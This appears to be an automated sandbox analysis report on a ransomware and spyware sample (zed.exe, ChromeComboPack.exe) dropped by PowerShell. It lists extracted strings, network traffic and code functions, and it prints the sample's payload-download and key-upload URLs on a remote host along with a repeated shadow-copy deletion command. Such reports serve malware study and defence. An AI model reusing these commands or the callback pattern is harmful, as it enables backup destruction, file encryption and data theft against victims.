Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
Source: zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/
Source: zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080331199.00000132F839E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
Source: zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: zed.exe, 0000000C.00000002.4735816641.00000132F84E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
Source: zed.exe, 0000000C.00000003.3080089518.00000132F842C000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;
Source: zed.exe, 0000000C.00000003.3080089518.00000132F842C000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr;r
Source: zed.exe, 0000000C.00000002.4736620041.00000132F89A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.apple.com/en-us/HT20
Source: zed.exe, 00000007.00000003.3202803355.0000019AE1690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.apple.com/en-us/HT201236
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: zed.exe, 0000000C.00000002.4744481462.00000132F9F34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8017
Source: zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8017#page-67
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8017#section-8.1.1
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8017#section-8.1.2
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: zed.exe, 0000000C.00000002.4740170642.00000132F9640000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0e
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://usjjsjsj.com.ng
Source: powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://usjjsjsj.com.ng/execute/payload.zip
Source: zed.exe, 0000000C.00000002.4745134537.00000132F9FD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://usjjsjsj.com.ng/post_fenec_key_user.php?
Source: zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=
Source: zed.exe, 0000000C.00000002.4745134537.00000132F9FD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000
Source: zed.exe, 0000000C.00000002.4745134537.00000132F9FD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000p
Source: zed.exe, 0000000C.00000003.3082680164.00000132F895D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3089378618.00000132F886F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084201791.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082680164.00000132F8910000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082961123.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz
Source: zed.exe, 0000000C.00000002.4736620041.00000132F89A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: zed.exe, 0000000C.00000002.4763048462.00007FFDA35CF000.00000002.00000001.01000000.0000001A.sdmp, zed.exe, 0000000C.00000002.4753635454.00007FFD8AFEA000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://www.openssl.org/H
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
Source: zed.exe, 0000000C.00000003.3084201791.00000132F88FC000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F88DD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084052929.00000132F895F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3085033089.00000132F8907000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
Source: zed.exe, 0000000C.00000002.4755379300.00007FFD8B568000.00000008.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.python.org/psf/license/
Source: zed.exe, 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.python.org/psf/license/)
Source: zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownHTTPS traffic detected: 142.132.252.48:443 -> 192.168.2.6:49721 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile deleted: C:\Users\user\Desktop\PALRGUCVEH\TQDFJHPUIU.png
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile deleted: C:\Users\user\Desktop\TQDFJHPUIU.png
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile deleted: C:\Users\user\Desktop\QCOILOQIKC.mp3
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile deleted: C:\Users\user\Desktop\GRXZDKKVDB\GRXZDKKVDB.docx
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile deleted: C:\Users\user\Desktop\PALRGUCVEH\EOWRVPQCCS.xlsx

System Summary

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\gogjothegoat\payload\zed.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeJump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Windows\System32\ips.txt
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Windows\System32\fennec_key.txt
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Windows\System32\encrypted_files.txt
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeFile created: C:\Windows\System32\deadline.json
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344CD63D0_2_00007FFD344CD63D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344D50970_2_00007FFD344D5097
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344D61250_2_00007FFD344D6125
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344C72610_2_00007FFD344C7261
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344C53FD0_2_00007FFD344C53FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344D28950_2_00007FFD344D2895
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344CA8F20_2_00007FFD344CA8F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344E1AFA0_2_00007FFD344E1AFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD344E1BFD0_2_00007FFD344E1BFD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD345943450_2_00007FFD34594345
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53010006_2_00007FF7E5301000
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53269646_2_00007FF7E5326964
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53089E06_2_00007FF7E53089E0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5325C006_2_00007FF7E5325C00
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5325E7C6_2_00007FF7E5325E7C
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E531DEF06_2_00007FF7E531DEF0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5319EA06_2_00007FF7E5319EA0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E531E5706_2_00007FF7E531E570
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5315D306_2_00007FF7E5315D30
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5311D546_2_00007FF7E5311D54
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53135A06_2_00007FF7E53135A0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53218746_2_00007FF7E5321874
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53180E46_2_00007FF7E53180E4
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53240AC6_2_00007FF7E53240AC
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53208C86_2_00007FF7E53208C8
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5311F606_2_00007FF7E5311F60
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53187946_2_00007FF7E5318794
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53297286_2_00007FF7E5329728
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53117406_2_00007FF7E5311740
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53098006_2_00007FF7E5309800
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E531DA5C6_2_00007FF7E531DA5C
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E530A2DB6_2_00007FF7E530A2DB
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53121646_2_00007FF7E5312164
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53119446_2_00007FF7E5311944
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53139A46_2_00007FF7E53139A4
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E530A4746_2_00007FF7E530A474
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53264186_2_00007FF7E5326418
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E53208C86_2_00007FF7E53208C8
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E530ACAD6_2_00007FF7E530ACAD
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5311B506_2_00007FF7E5311B50
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5323C106_2_00007FF7E5323C10
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 6_2_00007FF7E5312C106_2_00007FF7E5312C10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD344F27BF10_2_00007FFD344F27BF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD344F485C10_2_00007FFD344F485C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD345C0B9E10_2_00007FFD345C0B9E
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 12_2_00007FFD8A2512F012_2_00007FFD8A2512F0
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: 12_2_00007FFD8A25188012_2_00007FFD8A251880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD344B7DF214_2_00007FFD344B7DF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD344B704614_2_00007FFD344B7046
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD344B7DF217_2_00007FFD344B7DF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD344B704617_2_00007FFD344B7046
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D6E1032_2_00007FF78C9D6E10
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9B7E3032_2_00007FF78C9B7E30
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D7B7432_2_00007FF78C9D7B74
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9CADC032_2_00007FF78C9CADC0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9CF5D832_2_00007FF78C9CF5D8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9B8D6032_2_00007FF78C9B8D60
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C0EBC32_2_00007FF78C9C0EBC
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C16DC32_2_00007FF78C9C16DC
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C36F032_2_00007FF78C9C36F0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D4E2032_2_00007FF78C9D4E20
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D1AD832_2_00007FF78C9D1AD8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D762832_2_00007FF78C9D7628
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C967032_2_00007FF78C9C9670
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C8FC032_2_00007FF78C9C8FC0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C3F2C32_2_00007FF78C9C3F2C
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C275832_2_00007FF78C9C2758
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9CEF5832_2_00007FF78C9CEF58
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C10C832_2_00007FF78C9C10C8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9B983B32_2_00007FF78C9B983B
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D708C32_2_00007FF78C9D708C
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9BA20D32_2_00007FF78C9BA20D
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9B99DB32_2_00007FF78C9B99DB
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9DA93832_2_00007FF78C9DA938
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9CEAC432_2_00007FF78C9CEAC4
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D52BC32_2_00007FF78C9D52BC
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C12CC32_2_00007FF78C9C12CC
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D1AD832_2_00007FF78C9D1AD8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9D2A8432_2_00007FF78C9D2A84
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C23C032_2_00007FF78C9C23C0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C43F032_2_00007FF78C9C43F0
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C3B2832_2_00007FF78C9C3B28
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C0CB832_2_00007FF78C9C0CB8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C14D832_2_00007FF78C9C14D8
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 32_2_00007FF78C9C6C9032_2_00007FF78C9C6C90
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeCode function: String function: 00007FF7E5302710 appears 52 times
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: String function: 00007FF78C9B1E50 appears 53 times
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: String function: 00007FFD8A19C090 appears 47 times
Source: unicodedata.pyd.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.6.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: zlib1.dll.7.drStatic PE information: Number of sections : 12 > 10
Source: zlib1.dll.6.drStatic PE information: Number of sections : 12 > 10
Source: python3.dll.6.drStatic PE information: No import functions for PE file found
Source: python3.dll.7.drStatic PE information: No import functions for PE file found
Source: classification engineClassification label: mal100.rans.spyw.evad.winPS1@36/2334@2/2
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeCode function: 34_2_00007FFD8A19C090 GetLastError,FormatMessageW,_Py_NoneStruct,_Py_NoneStruct,PyUnicode_FromWideChar,PyUnicode_DecodeMBCS,_Py_BuildValue_SizeT,LocalFree,PyErr_SetObject,_Py_Dealloc,34_2_00007FFD8A19C090
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\gogjothegoatJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4236:120:WilError_03
